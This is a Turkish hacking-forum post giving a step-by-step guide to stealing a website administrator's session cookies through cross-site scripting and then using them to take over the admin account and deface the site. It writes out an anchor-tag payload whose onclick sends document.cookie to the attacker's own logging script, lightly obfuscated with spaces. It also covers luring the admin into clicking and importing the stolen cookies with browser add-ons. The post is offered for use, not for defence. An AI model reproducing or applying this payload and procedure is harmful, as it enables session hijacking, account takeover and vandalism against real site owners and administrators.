İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Cross Site Scripting (Cookie Açığı) // Araf ÖZGÜN KONU

19-06-2012 19:56
#1
Araff - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
Cennet ile C
Yaş:
25
Mesajlar:
2.871
Teşekkür (Etti):
0
Teşekkür (Aldı):
172
Konular:
2028
Ticaret:
(0) %
Cross Site Scripting cookie açığıdır.
Önemli bir açıktır,bir sitede cookie açığı; tespit ettikten sonra siteye üye olup admin cookilerini çalmakdır,tabii cookie'ye kendi sitenize ayar vereceksiniz,admin o cookielere tıkladığında,sitedeki cookieler sizin sitenize cookieler.txt dosyasına gelecek.
Daha sonra o gelen bilgilerden,hedef siteye girip admin bilgileri ile birlikte edit çekeceksiniz.


Öncelikle firefox tarayıcısı indirin.
Ardından
Firebug ve Firecookie eklentisi indirip firefox için kurun

Mesela bir video paylaşayım bununla ilgili :

Cross Site Scripting Attack Demo - YouTube

Ama derseniz ki benim domainim yok,alacak kadar maddi imkanımda yok,free domain alabilirsiniz.
Free domain almak ve site kurmak için şu konuya göz atabilirsiniz:

http://www.turkhackteam.net/vbulleti...zgun-konu.html

Son olarak size cookie mesajınıda vereyim:

<a onclick="d o c u m e n t.l o c a t i o n ='http://buraya kendi sitenizin adresini yazacaksınız örnek www.turkhackteam.net/something.php?
cookie='+escape(d o c u m e n t .cookie);"href="#">click here </a<

<a onclick'den sonra yazan harflerdeki boşlukları silin ** olarak gösterdiği için öyle koydum birde cookie='+escape( den sonraki yerdeki boşluklarıda silin

Birde birkaç yere değinmek istiyorum something.php örnek olarak verdim orayı,cookielerin sitenizde hangi dosyaya gelmesini istiyorsanız ona göre editleyeceksiniz.

Daha sonrasında bu cookie mesajını admine atacaksınız tek yapmanız gereken artık adminin o linke tıklayıp cookielerini çalmak olacaktır.

Diyelimki cookieler geldi ardından kendi sitenize girip cokies.txt'den cookileri alalım ardından indirdiğimiz firefox eklentisinden cookieleri atacağımız yeri bulalım tabii ki unutmayın edilenecek yeri bulmadan önce bütün cookie geçmişini tarayıcıdan silin yoksa editlencek yeri bulmanız zor olacaktır bu arada editlenecek yeride tahminden yapacaksınız tabi.
Mesela üstteki verdiğim videoda 3.31'de adam direk blogger_SID dosyasına gidiyor,tahmin etmelisiniz edit Cookie diyerek aldığınız cookieleri yapıştırın ve kaydedin artık admin yetkilerine sahip olacaksınız ve istediğiniz yere edit çekebilirsiniz. Konu biraz uzun ve zor ama önemli bir açıktır konu tamamen kendi anlatımım alıntı yok umarım işinize yarar teşekkür ederim

Konu Araff tarafından (19-06-2012 20:01 Saat 20:01 ) değiştirilmiştir.
yavuzselim46, ihan3t Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı